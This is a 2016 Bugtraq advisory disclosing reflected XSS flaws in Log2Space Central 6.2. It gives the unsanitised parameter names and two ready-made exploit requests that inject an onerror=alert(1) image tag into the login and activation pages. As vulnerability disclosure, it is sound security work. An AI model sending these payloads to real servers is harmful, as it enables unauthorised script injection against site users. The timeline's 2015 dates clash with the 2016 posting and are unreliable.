
Date: Wed, 27 Jan 2016 22:34:52 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: Log2Space Central v 6.2 Multiple XSS Vulnerability

## FULL DISCLOSURE

#Product    : Log2Space Central
#Exploit Author  : Rahul Pratap Singh
#Version    : 6.2
#Home page Link  :
http://www.spacecom.co.in/log2spacecentralserver_overview.html
#Website   : 0x62626262.wordpress.com
#Linkedin  : https://in.linkedin.com/in/rahulpratapsingh94
#Date      : 27/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"invID, login, UserName, DayFrom, MonthFrom, YearFrom, DayTo, MonthTo,
YearTo, usage" parameters are not sanitized that leads to Reflected XSS.

----------------------------------------
Exploit:
----------------------------------------
Send following Post request: (unauthenticated)

POST /cgi/login.php

txtLogin=xss&txtLoginPass=xss&Submit=Login&invID="/><img src=x
onerror=alert(1)>"&recID=

Send following Get request: (authenticated)

GET
/cgi/activation.php?pageRef=user&login="/><img%20src=x%20onerror=alert(1)>%20"

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/ualog2spacecentralxss.png

Fix:
This version is already patched according to Vendor.

Vulnerability Disclosure Timeline:
→ January 18, 2015  – Bug discovered, initial report to Vendor
→ January 19, 2015  – Vendor acknowledged, version already patched
(reported server not updated)
→ January 19, 2015  – Vendor asked for the affected server IP.
→ January 20, 2015  – Affected server IP, reported.
→ January 25, 2015  – Affected Server Patched.

Pub ref:
https://0x62626262.wordpress.com/2016/01/27/log2space-central-v-6-2-multiple-xss-vulnerability

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.

Download attachment "0x9ACF7D5F.asc" of type "application/pgp-keys" (3134 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)
